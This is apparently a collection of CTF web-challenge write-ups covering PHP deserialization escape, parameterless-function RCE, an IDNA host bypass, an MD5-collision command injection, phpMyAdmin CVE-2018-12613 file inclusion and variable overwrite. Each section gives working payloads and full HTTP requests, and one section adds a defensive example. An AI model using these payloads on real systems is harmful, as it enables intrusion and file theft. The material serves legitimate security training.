    $new_profile = parent::filter($new_profile);

    $where = "username = '$username'";
    return parent::update($this->table, 'profile', $new_profile, $where);
}
  • profile.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
    die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
    header('Location: update.php');
}
else {
    $profile = unserialize($profile);
    $phone = $profile['phone'];
    $email = $profile['email'];
    $nickname = $profile['nickname'];
    $photo = base64_encode(file_get_contents($profile['photo'])); // file_get_contents can be pointed at config.php
?>
  • update.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
    die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

    $username = $_SESSION['username'];
    if(!preg_match('/^\d{11}$/', $_POST['phone']))
        die('Invalid phone');

    if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
        die('Invalid email');

    if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
        die('Invalid nickname'); // the length > 10 check can be bypassed by passing an array

    $file = $_FILES['photo'];
    if($file['size'] < 5 or $file['size'] > 1000000)
        die('Photo size error');

    move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
    $profile['phone'] = $_POST['phone'];
    $profile['email'] = $_POST['email'];
    $profile['nickname'] = $_POST['nickname'];
    $profile['photo'] = 'upload/' . md5($file['name']);

    $user->update_profile($username, serialize($profile));
    echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
  • PHP deserialization escape

A normal PHP serialization:

a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:12:"xzasxzasxzas";}s:5:"photo";s:39:"upload/405ccd25d52f1fbf76ba04be9a371afd";}

The serialization we want:

a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:12:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";}

First consider only the serialize/unserialize process, and assume nothing is done to the data during upload.

<?php
$profile['phone'] =12345678901;
$profile['email'] = "123@123.com";
$profile['nickname'] = ['xzasxzasxzas";}s:5:"photo";s:10:"config.php'];
$profile['photo'] = 'upload/' . md5("xzas");
echo serialize($profile);
//a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:43:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";}s:5:"photo";s:39:"upload/405ccd25d52f1fbf76ba04be9a371afd";}

Since the serialized nickname has length 43, unserialize reads all 43 bytes up to the terminating ;, and the result we want does not appear:

s:43:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";

But update_profile() filters its arguments first (see class.php - class mysql->filter()), replacing blacklisted words with hacker, which changes the length of the serialized result.

where->hacker increases the actual string length by one, but the s:xxx length in the serialized data stays the same, which is what makes the PHP deserialization escape possible.

  • payload

Since the string that has to be pushed out is 31 characters long, 31 copies of where are enough:

php > $a ='";}s:5:"photo";s:10:"config.php';
php > echo strlen($a);
31
<?php
$profile['phone'] =12345678901;
$profile['email'] = "123@123.com";
$profile['nickname'] = ['wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php'];
$profile['photo'] = 'upload/' . md5("xzas");
//echo serialize($profile);
function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/'; # /'|\\/
    $string = preg_replace($escape, '_', $string); # replace any single quote or backslash in the input with an underscore

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i'; # /select|insert|update|delete|where/i
    return preg_replace($safe, 'hacker', $string); # replace the SQL keywords above with hacker
}
echo serialize($profile);
echo "\n";
echo filter(serialize($profile));
echo "\n";
print_r(unserialize(filter(serialize($profile))));
POST /update.php HTTP/1.1
Host: 6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn
Content-Length: 171589
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq1cAFarAvJr8wA7F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/update.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=fcce49634c704a465362161ce527a768
Connection: close

------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="phone"

12345678901
------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="email"

123@123.com
------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="nickname[]"

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php
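Two defences against the length-mismatch escape described above, as an added example that is not part of the challenge source: filter the fields before serializing (so every s:N: header is computed on the final bytes), and reject any stored blob that does not round-trip through unserialize()/serialize(). filter() is copied from class.php; the other function names are assumptions, and the profile is constructed from the write-up's payload.

```php
<?php
// Added example, not part of the challenge source. filter() is the
// challenge's own routine; filter_deep, safe_profile_blob and
// is_intact_serialized are assumed names.

function filter($string) {
    $escape = '/' . implode('|', array('\'', '\\\\')) . '/';
    $string = preg_replace($escape, '_', $string);
    $safe = '/' . implode('|', array('select', 'insert', 'update', 'delete', 'where')) . '/i';
    return preg_replace($safe, 'hacker', $string);
}

// Defence 1: filter every field first, then serialize. Each s:N: header is
// then computed on the already-filtered value, so lengths cannot drift.
function filter_deep($value) {
    return is_array($value) ? array_map('filter_deep', $value) : filter((string)$value);
}

function safe_profile_blob(array $profile): string {
    return serialize(filter_deep($profile));
}

// Defence 2: before trusting a stored blob, require that it round-trips.
// When the escape succeeds, the original tail (s:5:"photo";s:39:"upload/...";})
// is left over after the closing brace. unserialize() drops such trailing
// bytes (PHP before 8.3 does so without even a warning), so re-serializing
// the result no longer reproduces the stored string.
function is_intact_serialized(string $blob): bool {
    $value = @unserialize($blob, ['allowed_classes' => false]);
    if ($value === false && $blob !== serialize(false)) {
        return false;   // not even parseable
    }
    return serialize($value) === $blob;
}

// Constructed profile using the write-up's payload: 31 copies of "where"
// followed by the injected photo element.
$profile = [
    'phone'    => '12345678901',
    'email'    => '123@123.com',
    'nickname' => [str_repeat('where', 31) . '";}s:5:"photo";s:10:"config.php'],
    'photo'    => 'upload/' . md5('xzas'),
];

// Challenge order (serialize, then filter): the round-trip check fails and
// the photo field has been replaced by the injected value.
$vulnerable = filter(serialize($profile));
echo 'serialize-then-filter intact: ', var_export(is_intact_serialized($vulnerable), true), "\n";
echo 'photo after unserialize:      ', unserialize($vulnerable)['photo'], "\n";

// Safe order (filter, then serialize): the injected text stays inside
// nickname[0] as ordinary data and the round-trip check passes.
$safe = safe_profile_blob($profile);
echo 'filter-then-serialize intact: ', var_export(is_intact_serialized($safe), true), "\n";
echo 'photo after unserialize:      ', unserialize($safe)['photo'], "\n";
```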

[GXYCTF2019]禁止套娃

  • git leak

  • git_Extract
python .\git_extract.py "http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/.git/"


  • index.php
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE

https://www.cnblogs.com/wangtanzhi/p/12260986.html

Here highlight_file(session_id(session_start())); is used to get through; other methods are described in the links above.

import requests

url = 'http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/?exp=highlight_file(session_id(session_start()));'
payload = "flag.php"
# the session id becomes the file name that highlight_file() reads
cookies = {
    'PHPSESSID': payload
}
r = requests.get(url=url, cookies=cookies)
print(r.content)

[SUCTF 2019]Pythonginx

Source: https://github.com/team-su/SUCTF-2019/blob/master/Web/pythonginx

Source code and hints

<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->

from flask import Flask, request
from urllib.parse import urlsplit, urlunsplit
from urllib import parse
import urllib.request

app = Flask(__name__)

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    # strip spaces from the url
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

Reference: https://blog.csdn.net/qq_42181428/article/details/99741920

To read a file, the first two if checks must be bypassed while the third one must pass.

Use points 1 and 2 from the reference to construct the webshell:

# coding:utf-8
for i in range(128, 65537):
    tmp = chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        if ("-") in res:
            continue
        print("U:{} A:{} ascii:{} ".format(tmp, res, i))
    except:
        pass


  • Important nginx files

Configuration directory: /etc/nginx

Main configuration file: /etc/nginx/conf/nginx.conf

Service unit: /usr/lib64/systemd/system/nginx.service

Modules: /usr/lib64/nginx/modules

Binary: /usr/sbin/nginx

Default document root: /usr/share/nginx/html

Default log directory: /var/log/nginx

Configuration file (source install): /usr/local/nginx/conf/nginx.conf

https://www.cnblogs.com/wangtanzhi/p/12181032.html

  • payload:
file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.ⒸⒸ/usr/local/nginx/conf/nginx.conf


server {
    listen 80;
    location / {
        try_files $uri @app;
    }
    location @app {
        include uwsgi_params;
        uwsgi_pass unix:///tmp/uwsgi.sock;
    }
    location /static {
        alias /app/static;
    }
    # location /flag {
    #     alias /usr/fffffflag;
    # }
}

[安洵杯 2019]easy_web

https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_web

  • Read the source code
GET /index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd= HTTP/1.1
Host: 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


  • Source code
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
    body{
        background:url(./bj.png) no-repeat center center;
        background-size:cover;
        background-attachment:fixed;
        background-color:#CCCCCC;
    }
</style>
<body>
</body>
</html>
  • payload
POST /index.php?img=&cmd=ca\t%20/flag HTTP/1.1
Host: 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Content-Length: 773
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Origin: http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn/index.php?img=&cmd=ca\t%20/flag
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

a=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%07%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%f1%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%72%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%34%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%28%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%ab%6f%f7%2a%70&b=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%87%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%71%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%f2%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%b4%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%a8%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%2b%6f%f7%2a%70

[GWCTF 2019]我有一个数据库


  • phpMyAdmin 4.8.1 arbitrary file inclusion, CVE-2018-12613

https://blog.csdn.net/qq_33020901/article/details/80829269

https://blog.51cto.com/13770310/2131305?source=dra

show variables like 'datadir';
# /var/lib/mysql/
  • payload
http://e733f3ba-a431-4612-8a5e-3458d4c9cb30.node3.buuoj.cn/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag

[BJDCTF2020]Mark loves cat

https://github.com/BjdsecCA/BJDCTF2020

GitHack is recommended; the tool used earlier had problems.

  • index.php
<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;// $yds = $flag
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}


echo "the flag is: ".$flag;
  • flag.php
<?php

$flag = file_get_contents('/flag');
  • Variable overwrite

GET /index.html?yds=flag

[ASIS 2019]Unicorn shop

Similar to [SUCTF 2019]Pythonginx.

Items 1-3 should no longer exist in the challenge; only item 4 is still there.

You can search at https://www.compart.com/en/unicode/search?q=thousand#characters


POST /charge HTTP/1.1
Host: 39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn/charge
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

id=4&price=%25E2%2586%2588




HTTP/1.1 200 OK
Server: openresty
Date: Sat, 01 Aug 2020 20:15:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2572
Connection: close

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8"><!--Ah,really important,seriously. -->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Unicorn shop</title>
<!-- Don't be frustrated by the same view,we've changed the challenge content.-->
<!-- Bootstrap core CSS -->
<link href="/static/css/bootstrap.min.css?v=ec3bb52a00e176a7181d454dffaea219" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/static/css/jumbotron-narrow.css?v=166844ff66a82256d62737c8a6fc14bf" rel="stylesheet">
</head>
<!--We still have some surprise for admin.password-->
<body>
<div class="container">


<div class="alert alert-success alert-dismissable">
操作成功。
</div>


<div class="alert alert-success alert-dismissable">
flag{20386a66-bd60-4439-962d-962f7d6122fd}
</div>